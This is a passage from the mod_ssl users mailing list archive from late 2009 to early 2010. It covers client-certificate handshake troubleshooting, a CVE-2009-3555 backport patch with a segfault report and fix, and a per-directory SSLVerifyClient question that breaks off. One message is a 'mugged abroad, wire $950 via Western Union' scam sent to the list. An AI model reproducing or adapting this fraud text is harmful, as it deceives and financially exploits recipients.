> [Sun Nov 22 22:51:36 2009] [debug] ssl_engine_io.c(1836):
>
+-------------------------------------------------------------------------+
> [Sun Nov 22 22:51:36 2009] [debug] ssl_engine_kernel.c(1912): OpenSSL:
> Exit: error in SSLv2/v3 read client hello A
> [Sun Nov 22 22:51:36 2009] [info] [client ::1] SSL library error 1 in
> handshake (server www.***.net:443)
> [Sun Nov 22 22:51:36 2009] [info] SSL Library Error: 336027900
> error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol
> speaking not SSL to HTTPS port!?
> [Sun Nov 22 22:51:36 2009] [info] [client ::1] Connection closed to
> child 2 with abortive shutdown (server www.***.net:443)
> 
> I have tried a bund of different settings. Of course, I re-generated
> several times all the certificates, from the CA to the client.
> Both the CA and the client were imported into the web browser.
> 
> The mod-ssl settings are in no point different from the previous
> machine, so am I missing ?
> 
> So any help, any hint would be greatly appreciated.
> 
> Thank you in advance,
> 
> Regards,
> Jean-Christophe

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 24 22:40:33 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7F56114DA39; Tue, 24 Nov 2009 22:40:33 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from genki.phocean.net (89-159-121-109.rev.dartybox.com [89.159.121.109])
	by master.modssl.org (Postfix) with ESMTP id 2192414D839
	for ; Tue, 24 Nov 2009 22:40:16 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by genki.phocean.net (Postfix) with ESMTP id 4C10160055
	for ; Tue, 24 Nov 2009 22:42:05 +0100 (CET)
X-Virus-Scanned: amavisd-new at phocean.net
Received: from genki.phocean.net ([127.0.0.1])
	by localhost (genki.phocean.net [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id t-6o6gAbDMFH for ;
	Tue, 24 Nov 2009 22:42:02 +0100 (CET)
Received: from [192.168.222.10] (89-159-121-109.rev.dartybox.com [89.159.121.109])
	(using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits))
	(No client certificate requested)
	by genki.phocean.net (Postfix) with ESMTPSA id 6A10060051
	for ; Tue, 24 Nov 2009 22:41:46 +0100 (CET)
Subject: Re: error in SSLv2/v3 read client hello A
From: Jean-Christophe Baptiste 
To: modssl-users@modssl.org
In-Reply-To: 
References: <1258936169.24826.18.camel@thinkpad.phocean>
	 
Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-yMWJ+M7XABLVfcLwL4++"
Date: Tue, 24 Nov 2009 22:37:50 +0100
Message-Id: <1259098670.29413.2.camel@thinkpad.phocean>
Mime-Version: 1.0
X-Mailer: Evolution 2.28.0 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jean-Christophe Baptiste 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--=-yMWJ+M7XABLVfcLwL4++
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable

I continue talking to myself about it.

Just to let people know that I submitted a bug to openSUSE, because it
took me less than 5 minutes to get a blank Debian virtual machine to
work with the exact same certificates, virtual host configuration and
browser.

There is definitely something weired...


Le mardi 24 novembre 2009 =C3=A0 17:24 +0100, Jean-Christophe Baptiste a
=C3=A9crit :
> I am still stack with the same issue :
>=20
> [Tue Nov 24 16:56:15 2009] [debug] ssl_engine_kernel.c(1875): OpenSSL:
> Handshake: start
> [Tue Nov 24 16:56:15 2009] [debug] ssl_engine_kernel.c(1883): OpenSSL:
> Loop: before accept initialization
> [Tue Nov 24 16:56:15 2009] [debug] ssl_engine_kernel.c(1893): OpenSSL:
> Write: SSLv3 read client hello A
> [Tue Nov 24 16:56:15 2009] [debug] ssl_engine_kernel.c(1912): OpenSSL:
> Exit: error in SSLv3 read client hello A
> [Tue Nov 24 16:56:15 2009] [error] [client 194.2.193.253] Re-negotiation
> handshake failed: Not accepted by client!?
> [Tue Nov 24 16:56:23 2009] [debug] ssl_engine_io.c(1869): OpenSSL: I/O
> error, 5 bytes expected to read on BIO#7f313d364fc0 [mem: 7f313d8641a0]
>=20
> I renewed one more time all my certificates, so I don't think there is
> anything wrong with it.
> My apache configuration hasn't changed :
> 
>  SSLRequireSSL
>  SSLVerifyClient require
>  SSLVerifyDepth 1
>  Order allow,deny
>  allow from All
> 
>=20
> And any browser (Firefox, Opera) fail so I don't think it is a browser
> issue.
> Of course, I imported the CA and the client certificate...
>=20
> And still no prompt for the client certificate...
>=20
> Really no hint ? Could it be a bug in the distro package ?
>=20
> Thanks.
>=20
> On Mon, 23 Nov 2009 01:29:30 +0100, Jean-Christophe Baptiste
>  wrote:
> > Hi all,
> >=20
> > I have been using client certificate for a while (more than 2 years)
> > successfuly.
> >=20
> > But now, after migrating a server, I am stuck with a problem that I hav=
e
> > no idea how to handle.
> > I just spent 10 hours googling around and reading the doc without
> > finding any clue.
> >=20
> > On my new set-up, the web browser seems to reject the negociation :
> >=20
> > [Sun Nov 22 22:51:36 2009] [info] [client ::1] Connection to child 2
> > established (server www.***.net:443)
> > [Sun Nov 22 22:51:36 2009] [info] Seeding PRNG with 656 bytes of entrop=
y
> > [Sun Nov 22 22:51:36 2009] [debug] ssl_engine_kernel.c(1875): OpenSSL:
> > Handshake: start
> > [Sun Nov 22 22:51:36 2009] [debug] ssl_engine_kernel.c(1883): OpenSSL:
> > Loop: before/accept initialization
> > [Sun Nov 22 22:51:36 2009] [debug] ssl_engine_io.c(1858): OpenSSL: read
> > 11/11 bytes from BIO#7f35d1213840 [mem: 7f35d1218f00] (BIO dump follows=
)
> > [Sun Nov 22 22:51:36 2009] [debug] ssl_engine_io.c(1791):
> >
> +------------------------------------------------------------------------=
-+
> > [Sun Nov 22 22:51:36 2009] [debug] ssl_engine_io.c(1830): | 0000: 4f 50
> > 54 49 4f 4e 53 20-2a 20 48                 OPTIONS * H      |
> > [Sun Nov 22 22:51:36 2009] [debug] ssl_engine_io.c(1836):
> >
> +------------------------------------------------------------------------=
-+
> > [Sun Nov 22 22:51:36 2009] [debug] ssl_engine_kernel.c(1912): OpenSSL:
> > Exit: error in SSLv2/v3 read client hello A
> > [Sun Nov 22 22:51:36 2009] [info] [client ::1] SSL library error 1 in
> > handshake (server www.***.net:443)
> > [Sun Nov 22 22:51:36 2009] [info] SSL Library Error: 336027900
> > error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol
> > speaking not SSL to HTTPS port!?
> > [Sun Nov 22 22:51:36 2009] [info] [client ::1] Connection closed to
> > child 2 with abortive shutdown (server www.***.net:443)
> >=20
> > I have tried a bund of different settings. Of course, I re-generated
> > several times all the certificates, from the CA to the client.
> > Both the CA and the client were imported into the web browser.
> >=20
> > The mod-ssl settings are in no point different from the previous
> > machine, so am I missing ?
> >=20
> > So any help, any hint would be greatly appreciated.
> >=20
> > Thank you in advance,
> >=20
> > Regards,
> > Jean-Christophe

--=-yMWJ+M7XABLVfcLwL4++
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: Ceci est une partie de message
 =?ISO-8859-1?Q?num=E9riquement?= =?ISO-8859-1?Q?_sign=E9e?=

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.12 (GNU/Linux)

iQIcBAABAgAGBQJLDFIuAAoJEEElXOw26xO+eOUP/3wYLMd2pkOggOFl/hvNCE62
0qwYNXIJNXv6otirSY7S1tUWlAMpvkK40rX4IsXlCemQOBVsEEdnunfOpzDruD2l
eGWg3kLXZNyaRmYNYuzjNjWz3GbvdYVTLXGvZToHqkFzGC7OCCeDA5nr6ae0T6Zq
hEIkWIMcoYUuhRR6/40dw4rjayGlPWC5m/jNhn9/ZuzBEzmjhaR7T7g+SGNCBWu9
yPZmuU4bnszBQKMPQ8w+2rHD0SBTXAzNzjzoOqcv6XiI5Vu4nWICY37vUjpVvKMt
WhgNzJFfSS3OAsHclEOKBRa5BKWtXijwjcIssthmpxDVkhKBmSn89HZJPhvL6GZE
KmrNsk/iOTABsqeZ+1e9ev26/OealQWqm9ue5TVSvnGU/RdeIUG+s2bJNYIH9kvZ
dsSAAQtNHnbrGKoS1KBuGrzzgoL0Mth4qkV//TNPlzCzzlLRDAdkJClQ3q9mYUk/
Tntb64L57FMCfHKLYULkp+IZ+WoxE/Zpv0zO4fq367M5nv/Y+xUldJuYSpMMW5z0
dbGnzvy/43h2e314yM7TTHM6qOfyPJVFvR6uwGbszWucThOMbPD23Iq3K9Jdi6Ug
gi4yMxB+ly5dcLuvZSdiz9Ry10Ljo62zRWBIEnHoAI5WI90vpHq9YW8kmXRYbEJc
wZlIVPLyAtZmF5q3XfRs
=2uLa
-----END PGP SIGNATURE-----

--=-yMWJ+M7XABLVfcLwL4++--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Dec 14 13:24:46 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 421E014D9E8; Mon, 14 Dec 2009 13:24:46 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mailout.artfiles.de (mailout.artfiles.de [80.252.97.80])
	by master.modssl.org (Postfix) with ESMTP id 15F5A14D84F
	for ; Mon, 14 Dec 2009 13:24:46 +0100 (CET)
Received: from [80.252.98.63]
	auth=anw@artfiles.de
	by mailout.artfiles.de with esmtpa (Exim 4.69)
	id 1NK9xA-0004MQ-PZ
	for modssl-users@modssl.org; Mon, 14 Dec 2009 13:23:04 +0100
Message-ID: <4B262E27.8000401@artfiles.org>
Date: Mon, 14 Dec 2009 13:23:03 +0100
From: Andreas Worbs 
User-Agent: Thunderbird 2.0.0.23 (X11/20090817)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: New mirror
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andreas Worbs 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,
here are the facts about our mirror:

* URL of mirror: http://artfiles.org/modssl.org
* Hosting institution, country and city where the mirror is located:
 Artfiles New Media GmbH, Hamburg, Germany
* Contact email address: mirror@artfiles.org
* Update frequency:  daily
* IP: 80.252.110.38
* Speed: 1000MBit/s

Please add us to your list.

Mit freundlichem Gruß

Artfiles New Media GmbH

Andreas Worbs

-- 
Artfiles New Media GmbH | Heidenkampsweg 100 | 20097 Hamburg
Tel: 040 - 32 02 72 90 | Fax: 040 - 32 02 72 95
E-Mail: support@artfiles.de | Web: http://www.artfiles.de
Geschäftsführer: Carsten Bals | Harald Oltmanns | Tim Evers
Eingetragen im Handelsregister Hamburg - HRB 81478

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 29 22:59:40 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 94BAD14DA95; Tue, 29 Dec 2009 22:59:40 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mx1.cpanel.net (mx1.cpanel.net [208.74.121.68])
	by master.modssl.org (Postfix) with ESMTP id 0768A14D83F
	for ; Tue, 29 Dec 2009 22:59:23 +0100 (CET)
Received: from ng1.cptxoffice.net ([208.74.121.102] helo=[10.1.4.86])
	by mx1.cpanel.net with esmtpsa (TLSv1:AES256-SHA:256)
	(Exim 4.69)
	(envelope-from )
	id 1NPk3r-0000xH-Pc
	for modssl-users@modssl.org; Tue, 29 Dec 2009 15:57:03 -0600
Subject: Re: [PATCH] Backport patch for CVE-2009-3555 from Apache 2.x
From: John Lightsey 
To: modssl-users@modssl.org
In-Reply-To: <4B0AFAAD.2000504@kippdata.de>
References: <4B08840C.4000203@kippdata.de>
	 <1258999075.4992.15.camel@work.cptxoffice.net>
	 <4B0AFAAD.2000504@kippdata.de>
Content-Type: text/plain
Date: Tue, 29 Dec 2009 15:57:11 -0600
Message-Id: <1262123831.23152.61.camel@work.cptxoffice.net>
Mime-Version: 1.0
X-Mailer: Evolution 2.22.3.1 
Content-Transfer-Encoding: 7bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - mx1.cpanel.net
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - cpanel.net
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John Lightsey 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, 2009-11-23 at 22:12 +0100, Rainer Jung wrote:
> On 23.11.2009 18:57, John Lightsey wrote:
> > On Sun, 2009-11-22 at 01:21 +0100, Rainer Jung wrote:

> Thanks again. I updated the patch:
> 
> http://people.apache.org/~rjung/patches/cve-2009-3555_mod_ssl_2_8_21-1_3_41-v2.patch
> 
> The only changes are in ssl_engine_io.c, where the declaration of "char
> *reneg" is moved 4 times to the beginning of the function. Anything else
> you observed?

I received a report of segfaults caused by this patch.  They happen when
you have Apache proxy connections to a SSL destination.  IE:

RewriteRule ^/(.*) https://other_site.com/$1 [P]

The segfault happens at:

reneg = ap_ctx_get(c->client->ctx, "ssl::reneg");

in ssl_io_suck_read() because SSL_get_app_data(ssl) returns NULL.


#0  0x0000000000454bb5 in ssl_io_suck_read (ssl=0x10a26070,
buf=0x107ccd88 "UserDir", len=4096) at ssl_engine_io.c:275
        actx = (ap_ctx *) 0x10a26070
        ss = (struct ssl_io_suck_st *) 0x0
        r = (request_rec *) 0x0
        rv = 0
        reneg = 0x0
        c = (conn_rec *) 0x0
#1  0x0000000000454f31 in ssl_io_hook_read (fb=0x10a25c28,
buf=0x107ccd88 "UserDir", len=4096) at ssl_engine_io.c:394
        ssl = (SSL *) 0x10a26070
        c = (conn_rec *) 0x0
        s = (server_rec *) 0x0
        rc = 0
        reneg = 0x0
#2  0x000000000049a00f in ap_hook_call_func (ap=0x7fff98699110,
he=0x104f33b0, hf=0x105059c0) at ap_hook.c:649
        v1 = (void *) 0x10a25c28
        v2 = (void *) 0x107ccd88
        v3 = 4096
        v_rc = (void *) 0x7fff9869922c
        v_tmp = {v_char = 0 '\0', v_int = 0, v_long = 0, v_float = 0,
v_double = 0, v_ptr = 0x0}
        rc = 1
#3  0x00000000004982db in ap_hook_call (hook=0x4bbb5a "ap::buff::read")
at ap_hook.c:382
        i = 0
        he = (ap_hook_entry *) 0x104f33b0
        ap = {{gp_offset = 40, fp_offset = 48, overflow_arg_area =
0x7fff98699200, reg_save_area = 0x7fff98699140}}
        rc = 0
#4  0x000000000046af22 in ap_read (fb=0x10a25c28, buf=0x107ccd88,
nbyte=4096) at buff.c:255
        rv = 0


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec 30 04:05:33 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CE39514DA40; Wed, 30 Dec 2009 04:05:32 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from frfcqmg011ix3r8.montpellier.mebs.ihost.com (mail2.aspaway.fr [129.35.163.230])
	by master.modssl.org (Postfix) with ESMTP id 1666414D83F
	for ; Wed, 30 Dec 2009 04:05:08 +0100 (CET)
Received: from frfcqws071ix328.infra.montpellier.mebs.ihost.com (frfcqws071ix328 [10.0.77.8])
	by frfcqmg011ix3r8.montpellier.mebs.ihost.com (8.12.11.20060308/8.12.11) with ESMTP id nBU32wn8014257
	for ; Wed, 30 Dec 2009 04:02:58 +0100
Subject: Jean-Pierre Guilloteau est absent.
From: jpguilloteau@aspaway.fr
To: modssl-users@modssl.org
Message-ID: 
Date: Wed, 30 Dec 2009 04:00:53 +0100
X-MIMETrack: Serialize by Router on MES01ASP/SRV/ASPAWAY(Release 7.0.2|September 26, 2006) at
 12/30/2009 04:02:58 AM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jpguilloteau@aspaway.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I will be out of the office starting Fri 25/12/09 and will not return until
Mon 04/01/10.

I will respond to your message when I return.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan  1 21:46:29 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0E5E714D882; Fri,  1 Jan 2010 21:46:29 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mailserver.kippdata.de (capsella.kippdata.de [195.227.30.149])
	by master.modssl.org (Postfix) with ESMTP id 05CB414D83F
	for ; Fri,  1 Jan 2010 21:46:11 +0100 (CET)
Received: from [192.168.2.115] ([192.168.2.115])
	by mailserver.kippdata.de (8.13.5/8.13.5) with ESMTP id o01Ki0xM025955
	for ; Fri, 1 Jan 2010 21:44:01 +0100 (CET)
Message-ID: <4B3E5E90.8030606@kippdata.de>
Date: Fri, 01 Jan 2010 21:44:00 +0100
From: Rainer Jung 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.5) Gecko/20091204 Thunderbird/3.0
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: [PATCH] Backport patch for CVE-2009-3555 from Apache 2.x
References: <4B08840C.4000203@kippdata.de> <1258999075.4992.15.camel@work.cptxoffice.net> <4B0AFAAD.2000504@kippdata.de> <1262123831.23152.61.camel@work.cptxoffice.net>
In-Reply-To: <1262123831.23152.61.camel@work.cptxoffice.net>
Content-Type: text/plain; charset=ISO-8859-15; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rainer Jung 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On 29.12.2009 22:57, John Lightsey wrote:
> On Mon, 2009-11-23 at 22:12 +0100, Rainer Jung wrote:
>> On 23.11.2009 18:57, John Lightsey wrote:
>>> On Sun, 2009-11-22 at 01:21 +0100, Rainer Jung wrote:
>
>> Thanks again. I updated the patch:
>>
>> http://people.apache.org/~rjung/patches/cve-2009-3555_mod_ssl_2_8_21-1_3_41-v2.patch
>>
>> The only changes are in ssl_engine_io.c, where the declaration of "char
>> *reneg" is moved 4 times to the beginning of the function. Anything else
>> you observed?
>
> I received a report of segfaults caused by this patch.  They happen when
> you have Apache proxy connections to a SSL destination.  IE:
>
> RewriteRule ^/(.*) https://other_site.com/$1 [P]
>
> The segfault happens at:
>
> reneg = ap_ctx_get(c->client->ctx, "ssl::reneg");
>
> in ssl_io_suck_read() because SSL_get_app_data(ssl) returns NULL.
>
>
> #0  0x0000000000454bb5 in ssl_io_suck_read (ssl=0x10a26070,
> buf=0x107ccd88 "UserDir", len=4096) at ssl_engine_io.c:275
>          actx = (ap_ctx *) 0x10a26070
>          ss = (struct ssl_io_suck_st *) 0x0
>          r = (request_rec *) 0x0
>          rv = 0
>          reneg = 0x0
>          c = (conn_rec *) 0x0
> #1  0x0000000000454f31 in ssl_io_hook_read (fb=0x10a25c28,
> buf=0x107ccd88 "UserDir", len=4096) at ssl_engine_io.c:394
>          ssl = (SSL *) 0x10a26070
>          c = (conn_rec *) 0x0
>          s = (server_rec *) 0x0
>          rc = 0
>          reneg = 0x0
> #2  0x000000000049a00f in ap_hook_call_func (ap=0x7fff98699110,
> he=0x104f33b0, hf=0x105059c0) at ap_hook.c:649
>          v1 = (void *) 0x10a25c28
>          v2 = (void *) 0x107ccd88
>          v3 = 4096
>          v_rc = (void *) 0x7fff9869922c
>          v_tmp = {v_char = 0 '\0', v_int = 0, v_long = 0, v_float = 0,
> v_double = 0, v_ptr = 0x0}
>          rc = 1
> #3  0x00000000004982db in ap_hook_call (hook=0x4bbb5a "ap::buff::read")
> at ap_hook.c:382
>          i = 0
>          he = (ap_hook_entry *) 0x104f33b0
>          ap = {{gp_offset = 40, fp_offset = 48, overflow_arg_area =
> 0x7fff98699200, reg_save_area = 0x7fff98699140}}
>          rc = 0
> #4  0x000000000046af22 in ap_read (fb=0x10a25c28, buf=0x107ccd88,
> nbyte=4096) at buff.c:255
>          rv = 0

Thank you for your feedback and the analysis. I could reproduce this and 
have updated the patch:

http://people.apache.org/~rjung/patches/cve-2009-3555_mod_ssl_2_8_21-1_3_41-v3.patch

I tested with and without SSL_EXPERIMENTAL_PROXY and it worked for my 
tests. The code doesn't try to change/fix renegotiation behaviour for 
ssl on the client side when used as a proxy.

As always: feedback welcome!

Regards,

Rainer
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 12 15:46:23 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0785814D9F5; Tue, 12 Jan 2010 15:46:23 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail-bw0-f227.google.com (mail-bw0-f227.google.com [209.85.218.227])
	by master.modssl.org (Postfix) with ESMTP id CF5BA14D9D6
	for ; Tue, 12 Jan 2010 15:46:06 +0100 (CET)
Received: by bwz27 with SMTP id 27so1115910bwz.1
        for ; Tue, 12 Jan 2010 06:43:57 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:mime-version:received:date:message-id:subject
         :from:content-type;
        bh=wLLqiy7VKZgK6PiI+N053yM7n36hlfETem7LNeKNoAY=;
        b=j8z0Y1XGHgJHK7TcM2aokX+AARxSNBaUX69piM4k0AAFdfgULlZH9FrPqFQaoo8oKJ
         Rv2++aLYAgs9pjrWi9c/2KK8l/ZCT21WIR7fKW+WcJ+Fx1ZRdMZ1W3F4lLJQdaTalC+I
         6yuCjZNITcHPiQ32Y7fJogvJc9da5Xi6oPng8=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=mime-version:date:message-id:subject:from:content-type;
        b=tj8eQLPns8COK6oib1EPO3aoejwa4PBSZI/80YLlkJ4muRB1L66tb1aJd7NGn26U0F
         AVyYBzl5iKP5tpVhnx1zi6scXvwT16JXR2mghrmhMOlDUFg55zYAo8r7dHOi7sZV4/tm
         I/6DYuDdSX9ObD4bMkLWjzF7/JGm1ZE0S5xx8=
MIME-Version: 1.0
Received: by 10.204.6.203 with SMTP id a11mt3077897bka.50.1263307430372; Tue, 
	12 Jan 2010 06:43:50 -0800 (PST)
Date: Tue, 12 Jan 2010 14:43:50 +0000
Message-ID: 
Subject: NEED HELP!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
From: Chris DiLorenzo 
Content-Type: multipart/alternative; boundary=0015175884b60ae0ca047cf8af41
To: undisclosed-recipients:;
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Chris DiLorenzo 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0015175884b60ae0ca047cf8af41
Content-Type: text/plain; charset=ISO-8859-1

Hi, Am Sorry for this message because it may get to you as supprise but it's
because of the situation of things right now. I want use this opportunity to
explain my problem. I was here in London on Vacation but yesterday thing
change because i was mugged at hotel am staying.

The worse of it is that bags, cash and cards and my cell phone was stolen at
during the incident and it's such a crazy experience for me. Now, am
stranded here without any money with me and i need flying back home.
Although am so happy that am physically ok and my passport still save with
me.

I have been to police to make report about the inccident but the best help
they could render to me is that they lead me to the embassy. Now, embassy
have arrange a flight for me which was schedule on 25th of February 2010 but
i dont want to wait long anymore before i can get back home.

I have been able to raise some money through my friends and family but am
short of $950 USD to complete the money for my flight ticket. Please, i need
you to loan me with sum amount $950 USD and i promise you i will pay you
back any amount you can afford to loan as soon as i get back home.

You can check Western Union Website to locate the nearest outlet around you
or wire the money online on their website (www.westernunion.com)

I need you to wire the money to me via Western Union Money Transfer with my
name:

Receiver Name : Chris DiLorenzo

My location : Dunstable Beds, LU5 5SD, United Kingdom.

As soon as you wire the money you will need provide me the below information

MTCN: ???

Amount Send: ???

Sender's Name: ???

So that i can visit any nearest Western Union Outlet to pick up the money
with my passport here in United Kingdom. Please do not see this message as
virus or spam and i will be very happy if you can help me out.

Thank you

Chris DiLorenzo

--0015175884b60ae0ca047cf8af41
Content-Type: text/html; charset=ISO-8859-1

Hi, Am Sorry for this message because it may get to you as supprise but
it's because of the situation of things right now. I want use this
opportunity to explain my problem. I was here in London on Vacation but
yesterday thing change because i was mugged at hotel am staying.







The worse of it is that bags, cash and cards and my cell phone was
stolen at during the incident and it's such a crazy experience for me.
Now, am stranded here without any money with me and i need flying back
home. Although am so happy that am physically ok and my passport still
save with me.







I have been to police to make report about the inccident but the best
help they could render to me is that they lead me to the embassy. Now,
embassy have arrange a flight for me which was schedule on 25th of
February 2010 but i dont want to wait long anymore before i can get
back home.







I have been able to raise some money through my friends and family but
am short of $950 USD to complete the money for my flight ticket.
Please, i need you to loan me with sum amount $950 USD and i promise
you i will pay you back any amount you can afford to loan as soon as i
get back home.







You can check Western Union Website to locate the nearest outlet around
you or wire the money online on their website (www.westernunion.com)







I need you to wire the money to me via Western Union Money Transfer with my name:







Receiver Name : Chris DiLorenzo







My location : Dunstable Beds, LU5 5SD, United Kingdom.







As soon as you wire the money you will need provide me the below information







MTCN: ???







Amount Send: ???







Sender's Name: ???







So that i can visit any nearest Western Union Outlet to pick up the
money with my passport here in United Kingdom. Please do not see this
message as virus or spam and i will be very happy if you can help me
out.







Thank you







Chris DiLorenzo























--0015175884b60ae0ca047cf8af41--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 19 23:55:48 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id AC39014DA27; Tue, 19 Jan 2010 23:55:48 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from sandstone.cs.wisc.edu (sandstone.cs.wisc.edu [128.105.6.39])
	by master.modssl.org (Postfix) with ESMTP id 11ED614D836
	for ; Tue, 19 Jan 2010 23:55:31 +0100 (CET)
Received: from webmail.cs.wisc.edu (skippy.cs.wisc.edu [128.105.7.38])
	by sandstone.cs.wisc.edu (8.14.1/8.14.1) with ESMTP id o0JMrLnW020129
	for ; Tue, 19 Jan 2010 16:53:21 -0600
Received: from 74.253.161.42
        (SquirrelMail authenticated user aaron)
        by webmail.cs.wisc.edu with HTTP;
        Tue, 19 Jan 2010 16:53:21 -0600
Message-ID: 
Date: Tue, 19 Jan 2010 16:53:21 -0600
Subject: SSLVerifyClient require per directory context
From: aaron@cs.wisc.edu
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.19
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: aaron@cs.wisc.edu
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'm trying to go through the most basic tutorials on mod_ssl and I'm
having a problem trying to get my server to issue a certificate request
for a particular URL.  I'm listing my Apache and OpenSSL version
information.

# httpd -v
Server version: Apache/2.2.14 (Unix)
Server built:   Dec  3 2009 10:25:53

# openssl version
OpenSSL 1.0.0-fips-beta4 10 Nov 2009

I've followed the steps of this tutorial:

http://www.vanemery.com/Linux/Apache/apache-SSL.html

I've also tried to follow the SSL HowTo on the Apache site:

http://httpd.apache.org/docs/2.2/ssl/ssl_howto.html

I'll try to get at the heart of the issue.  If I have the following in my
ssl.conf file in the VirtualHost section

SSLVerifyClient require
SSLVerifyDepth 1

then everything works as expected.  I have the client certificate
installed in my client web browser, and when I click on the link to my
https server, which is https://myserver, then it prompts me to get the
certificate of the server and confirm a security exception, and also
prompts me with a user identification request, at which point I can chose
a certificate to identify the client to my server.  I see my index.html
page, which has a link to the directory https://myserver/Certneeded.  I
can click on this directory and see a list of the files in that directory.

However, if I change my ssl.conf in an attempt to "force clients to
authenticate using certificates for a particular URL, but still allow
arbitrary clients to access the rest of the server", as per the Apache
HowTo, then I never get prompted for this "user identification request" to
which I can identify my client web browser to the server.

In this case, my ssl.conf file changes to the following.

SSLVerifyClient none

        Options Indexes
        SSLVerifyClient require
        SSLVerifyDepth 1


Now, when I click on the link to https://myserver/Certneeded, the client
browser just hangs until a timeout is reached, I'm never prompted to
present a certificate for identification, and the contents of the
